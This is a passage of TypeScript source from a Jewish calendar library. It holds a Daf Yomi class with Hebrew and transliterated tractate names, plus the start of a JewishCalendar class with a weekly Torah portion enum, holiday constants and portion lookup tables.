'Kesubos', 'Nedarim', 'Nazir', 'Sotah', 'Gitin', 'Kiddushin', '<NAME>', '<NAME>', '<NAME>',
'Sanhedrin', 'Makkos', 'Shevuos', '<NAME>', 'Horiyos', 'Zevachim', 'Menachos', 'Chullin', 'Bechoros',
'Arachin', 'Temurah', 'Kerisos', 'Meilah', 'Kinnim', 'Tamid', 'Midos', 'Niddah'];
private static readonly masechtosBavli: string[] = ['\u05D1\u05E8\u05DB\u05D5\u05EA', '\u05E9\u05D1\u05EA',
'\u05E2\u05D9\u05E8\u05D5\u05D1\u05D9\u05DF', '\u05E4\u05E1\u05D7\u05D9\u05DD',
'\u05E9\u05E7\u05DC\u05D9\u05DD', '\u05D9\u05D5\u05DE\u05D0', '\u05E1\u05D5\u05DB\u05D4',
'\u05D1\u05D9\u05E6\u05D4', '\u05E8\u05D0\u05E9 \u05D4\u05E9\u05E0\u05D4',
'\u05EA\u05E2\u05E0\u05D9\u05EA', '\u05DE\u05D2\u05D9\u05DC\u05D4',
'\u05DE\u05D5\u05E2\u05D3 \u05E7\u05D8\u05DF', '\u05D7\u05D2\u05D9\u05D2\u05D4',
'\u05D9\u05D1\u05DE\u05D5\u05EA', '\u05DB\u05EA\u05D5\u05D1\u05D5\u05EA', '\u05E0\u05D3\u05E8\u05D9\u05DD',
'\u05E0\u05D6\u05D9\u05E8', '\u05E1\u05D5\u05D8\u05D4', '\u05D2\u05D9\u05D8\u05D9\u05DF',
'\u05E7\u05D9\u05D3\u05D5\u05E9\u05D9\u05DF', '\u05D1\u05D1\u05D0 \u05E7\u05DE\u05D0',
'\u05D1\u05D1\u05D0 \u05DE\u05E6\u05D9\u05E2\u05D0', '\u05D1\u05D1\u05D0 \u05D1\u05EA\u05E8\u05D0',
'\u05E1\u05E0\u05D4\u05D3\u05E8\u05D9\u05DF', '\u05DE\u05DB\u05D5\u05EA',
'\u05E9\u05D1\u05D5\u05E2\u05D5\u05EA', '\u05E2\u05D1\u05D5\u05D3\u05D4 \u05D6\u05E8\u05D4',
'\u05D4\u05D5\u05E8\u05D9\u05D5\u05EA', '\u05D6\u05D1\u05D7\u05D9\u05DD', '\u05DE\u05E0\u05D7\u05D5\u05EA',
'\u05D7\u05D5\u05DC\u05D9\u05DF', '\u05D1\u05DB\u05D5\u05E8\u05D5\u05EA', '\u05E2\u05E8\u05DB\u05D9\u05DF',
'\u05EA\u05DE\u05D5\u05E8\u05D4', '\u05DB\u05E8\u05D9\u05EA\u05D5\u05EA', '\u05DE\u05E2\u05D9\u05DC\u05D4',
'\u05E7\u05D9\u05E0\u05D9\u05DD', '\u05EA\u05DE\u05D9\u05D3', '\u05DE\u05D9\u05D3\u05D5\u05EA',
'\u05E0\u05D3\u05D4'];
private static readonly masechtosYerushalmiTransliterated: string[] = ['Berachos', 'Pe\'ah', 'Demai', 'Kilayim', 'Shevi\'is',
'Terumos', 'Ma\'asros', '<NAME>', 'Chalah', 'Orlah', 'Bikurim', 'Shabbos', 'Eruvin', 'Pesachim',
'Beitzah', '<NAME>', 'Yoma', 'Sukah', 'Ta\'anis', 'Shekalim', 'Megilah', 'Chagigah', 'Mo<NAME>atan',
'Yevamos', 'Kesuvos', 'Sotah', 'Nedarim', 'Nazir', 'Gitin', 'Kidushin', 'Bava Kama', 'Bava Metzia',
'<NAME>', 'Sanhedrin', 'Makos', 'Shevuos', '<NAME>', 'Horayos', 'Nidah', 'No Daf Today'];
private static readonly masechtosYerushlmi: string[] = ['\u05d1\u05e8\u05db\u05d5\u05ea', '\u05e4\u05d9\u05d0\u05d4',
'\u05d3\u05de\u05d0\u05d9', '\u05db\u05dc\u05d0\u05d9\u05d9\u05dd', '\u05e9\u05d1\u05d9\u05e2\u05d9\u05ea',
'\u05ea\u05e8\u05d5\u05de\u05d5\u05ea', '\u05de\u05e2\u05e9\u05e8\u05d5\u05ea', '\u05de\u05e2\u05e9\u05e8 \u05e9\u05e0\u05d9',
'\u05d7\u05dc\u05d4', '\u05e2\u05d5\u05e8\u05dc\u05d4', '\u05d1\u05d9\u05db\u05d5\u05e8\u05d9\u05dd',
'\u05e9\u05d1\u05ea', '\u05e2\u05d9\u05e8\u05d5\u05d1\u05d9\u05df', '\u05e4\u05e1\u05d7\u05d9\u05dd',
'\u05d1\u05d9\u05e6\u05d4', '\u05e8\u05d0\u05e9 \u05d4\u05e9\u05e0\u05d4', '\u05d9\u05d5\u05de\u05d0',
'\u05e1\u05d5\u05db\u05d4', '\u05ea\u05e2\u05e0\u05d9\u05ea', '\u05e9\u05e7\u05dc\u05d9\u05dd', '\u05de\u05d2\u05d9\u05dc\u05d4',
'\u05d7\u05d2\u05d9\u05d2\u05d4', '\u05de\u05d5\u05e2\u05d3 \u05e7\u05d8\u05df', '\u05d9\u05d1\u05de\u05d5\u05ea',
'\u05db\u05ea\u05d5\u05d1\u05d5\u05ea', '\u05e1\u05d5\u05d8\u05d4', '\u05e0\u05d3\u05e8\u05d9\u05dd', '\u05e0\u05d6\u05d9\u05e8',
'\u05d2\u05d9\u05d8\u05d9\u05df', '\u05e7\u05d9\u05d3\u05d5\u05e9\u05d9\u05df', '\u05d1\u05d1\u05d0 \u05e7\u05de\u05d0',
'\u05d1\u05d1\u05d0 \u05de\u05e6\u05d9\u05e2\u05d0', '\u05d1\u05d1\u05d0 \u05d1\u05ea\u05e8\u05d0',
'\u05e9\u05d1\u05d5\u05e2\u05d5\u05ea', '\u05de\u05db\u05d5\u05ea', '\u05e1\u05e0\u05d4\u05d3\u05e8\u05d9\u05df',
'\u05e2\u05d1\u05d5\u05d3\u05d4 \u05d6\u05e8\u05d4', '\u05d4\u05d5\u05e8\u05d9\u05d5\u05ea', '\u05e0\u05d9\u05d3\u05d4',
'\u05d0\u05d9\u05df \u05d3\u05e3 \u05d4\u05d9\u05d5\u05dd'];
/**
* @return the masechtaNumber
*/
public getMasechtaNumber(): number {
return this.masechtaNumber;
}
/**
* Set the masechta number in the order of the Daf Yomi. The sequence is: Berachos, Shabbos, Eruvin, Pesachim,
* Shekalim, Yoma, Sukkah, Beitzah, Rosh Hashana, Taanis, Megillah, Moed Katan, Chagigah, Yevamos, Kesubos, Nedarim,
* Nazir, Sotah, Gitin, Kiddushin, Bava Kamma, Bava Metzia, Bava Basra, Sanhedrin, Makkos, Shevuos, Avodah Zarah,
* Horiyos, Zevachim, Menachos, Chullin, Bechoros, Arachin, Temurah, Kerisos, Meilah, Kinnim, Tamid, Midos and
* Niddah.
*
* @param masechtaNumber
* the masechtaNumber in the order of the Daf Yomi to set
*/
public setMasechtaNumber(masechtaNumber: number): void {
this.masechtaNumber = masechtaNumber;
}
/**
* Constructor that creates a Daf setting the {@link #setMasechtaNumber(int) masechta Number} and
* {@link #setDaf(int) daf Number}
*
* @param masechtaNumber the masechtaNumber in the order of the Daf Yomi to set
* @param daf the daf (page) number to set
*/
constructor(masechtaNumber: number, daf: number) {
this.masechtaNumber = masechtaNumber;
this.daf = daf;
}
/**
* Returns the daf (page number) of the Daf Yomi
* @return the daf (page number) of the Daf Yomi
*/
public getDaf(): number {
return this.daf;
}
/**
* Sets the daf (page number) of the Daf Yomi
* @param daf the daf (page) number
*/
public setDaf(daf: number): void {
this.daf = daf;
}
/**
* Returns the transliterated name of the masechta (tractate) of the Daf Yomi. The list of mashechtos is: Berachos,
* Shabbos, Eruvin, Pesachim, Shekalim, Yoma, Sukkah, Beitzah, Rosh Hashana, Taanis, Megillah, Moed Katan, Chagigah,
* Yevamos, Kesubos, Nedarim, Nazir, Sotah, Gitin, Kiddushin, Bava Kamma, Bava Metzia, Bava Basra, Sanhedrin,
* Makkos, Shevuos, Avodah Zarah, Horiyos, Zevachim, Menachos, Chullin, Bechoros, Arachin, Temurah, Kerisos, Meilah,
* Kinnim, Tamid, Midos and Niddah.
*
* @return the transliterated name of the masechta (tractate) of the Daf Yomi such as Berachos.
*/
public getMasechtaTransliterated(): string {
return Daf.masechtosBavliTransliterated[this.masechtaNumber];
}
/**
* Returns the masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*
* @return the masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*/
public getMasechta(): string {
return Daf.masechtosBavli[this.masechtaNumber];
}
/**
* Returns the transliterated name of the masechta (tractate) of the Daf Yomi in Yerushalmi. The list of mashechtos
* is: Berachos, Pe'ah, Demai, Kilayim, Shevi'is, Terumos, Ma'asros, Ma'aser Sheni, Chalah, Orlah, Bikurim, Shabbos,
* Eruvin, Pesachim, Beitzah, <NAME>ah, Yoma, Sukah, Ta'anis, Shekalim, Megilah, Chagigah, Moed Katan, Yevamos,
* Kesuvos, Sotah, Nedarim, Nazir, Gitin, Kidushin, Bava Kama, Bava Metzia, Bava Basra, Sanhedrin, Makos, Shevuos,
* Avodah Zarah, Horayos, And Nidah .
*
* @return the transliterated name of the masechta (tractate) of the Daf Yomi such as Berachos.
*/
public getYerushlmiMasechtaTransliterated(): string {
return Daf.masechtosYerushalmiTransliterated[this.masechtaNumber];
}
/**
* Returns the Yerushlmi masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*
* @return the Yerushalmi masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*/
public getYerushalmiMasechta(): string {
return Daf.masechtosYerushlmi[this.masechtaNumber];
}
}
<file_sep>import { DateTime } from 'luxon';
import { GeoLocation } from '../util/GeoLocation';
import { Daf } from './Daf';
import { JewishDate } from './JewishDate';
import { Calendar } from '../polyfills/Utils';
const { MONDAY, TUESDAY, THURSDAY, FRIDAY, SATURDAY } = Calendar;
/**
* Note that despite there being a Vezos Habracha value, this is for consistency, and this is not currently used
*
*/
export enum Parsha {
NONE, BERESHIS, NOACH, LECH_LECHA, VAYERA, CHAYEI_SARA, TOLDOS, VAYETZEI,
VAYISHLACH, VAYESHEV, MIKETZ, VAYIGASH, VAYECHI, SHEMOS, VAERA, BO,
BESHALACH, YISRO, MISHPATIM, TERUMAH, TETZAVEH, KI_SISA, VAYAKHEL,
PEKUDEI, VAYIKRA, TZAV, SHMINI, TAZRIA, METZORA, ACHREI_MOS, KEDOSHIM,
EMOR, BEHAR, BECHUKOSAI, BAMIDBAR, NASSO, BEHAALOSCHA, SHLACH, KORACH,
CHUKAS, BALAK, PINCHAS, MATOS, MASEI, DEVARIM, VAESCHANAN, EIKEV,
REEH, SHOFTIM, KI_SEITZEI, KI_SAVO, NITZAVIM, VAYEILECH, HAAZINU,
VZOS_HABERACHA, VAYAKHEL_PEKUDEI, TAZRIA_METZORA, ACHREI_MOS_KEDOSHIM, BEHAR_BECHUKOSAI,
CHUKAS_BALAK, MATOS_MASEI, NITZAVIM_VAYEILECH, SHKALIM, ZACHOR, PARA, HACHODESH,
}
/**
* The JewishCalendar extends the JewishDate class and adds calendar methods.
*
* This open source Java code was originally ported by <a href="http://www.facebook.com/avromf"><NAME></a>
* from his C++ code. It was refactored to fit the KosherJava Zmanim API with simplification of the code, enhancements
* and some bug fixing. The class allows setting whether the holiday and parsha scheme follows the Israel scheme or outside Israel
* scheme. The default is the outside Israel scheme.
* The parsha code was ported by <NAME> from his <a href="https://github.com/yparitcher/libzmanim">libzmanim</a> code.
*
* TODO: Some do not belong in this class, but here is a partial list of what should still be implemented in some form:
* <ol>
* <li>Add Isru Chag</li>
* <li>Mishna yomis etc</li>
* </ol>
*
* @see java.util.Date
* @see java.util.Calendar
* @author © <NAME> 2019
* @author © <NAME> 2002
* @author © <NAME> 2011 - 2019
*/
export class JewishCalendar extends JewishDate {
public static readonly EREV_PESACH: number = 0;
public static readonly PESACH: number = 1;
public static readonly CHOL_HAMOED_PESACH: number = 2;
public static readonly PESACH_SHENI: number = 3;
public static readonly EREV_SHAVUOS: number = 4;
public static readonly SHAVUOS: number = 5;
public static readonly SEVENTEEN_OF_TAMMUZ: number = 6;
public static readonly TISHA_BEAV: number = 7;
public static readonly TU_BEAV: number = 8;
public static readonly EREV_ROSH_HASHANA: number = 9;
public static readonly ROSH_HASHANA: number = 10;
public static readonly FAST_OF_GEDALYAH: number = 11;
public static readonly EREV_YOM_KIPPUR: number = 12;
public static readonly YOM_KIPPUR: number = 13;
public static readonly EREV_SUCCOS: number = 14;
public static readonly SUCCOS: number = 15;
public static readonly CHOL_HAMOED_SUCCOS: number = 16;
public static readonly HOSHANA_RABBA: number = 17;
public static readonly SHEMINI_ATZERES: number = 18;
public static readonly SIMCHAS_TORAH: number = 19;
// public static final int EREV_CHANUKAH = 20;// probably remove this
public static readonly CHANUKAH: number = 21;
public static readonly TENTH_OF_TEVES: number = 22;
public static readonly TU_BESHVAT: number = 23;
public static readonly FAST_OF_ESTHER: number = 24;
public static readonly PURIM: number = 25;
public static readonly SHUSHAN_PURIM: number = 26;
public static readonly PURIM_KATAN: number = 27;
public static readonly ROSH_CHODESH: number = 28;
public static readonly YOM_HASHOAH: number = 29;
public static readonly YOM_HAZIKARON: number = 30;
public static readonly YOM_HAATZMAUT: number = 31;
public static readonly YOM_YERUSHALAYIM: number = 32;
private inIsrael: boolean = false;
private useModernHolidays: boolean = false;
public static readonly parshalist: Parsha[][] = [
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.ACHREI_MOS, Parsha.NONE, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.ACHREI_MOS, Parsha.NONE, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
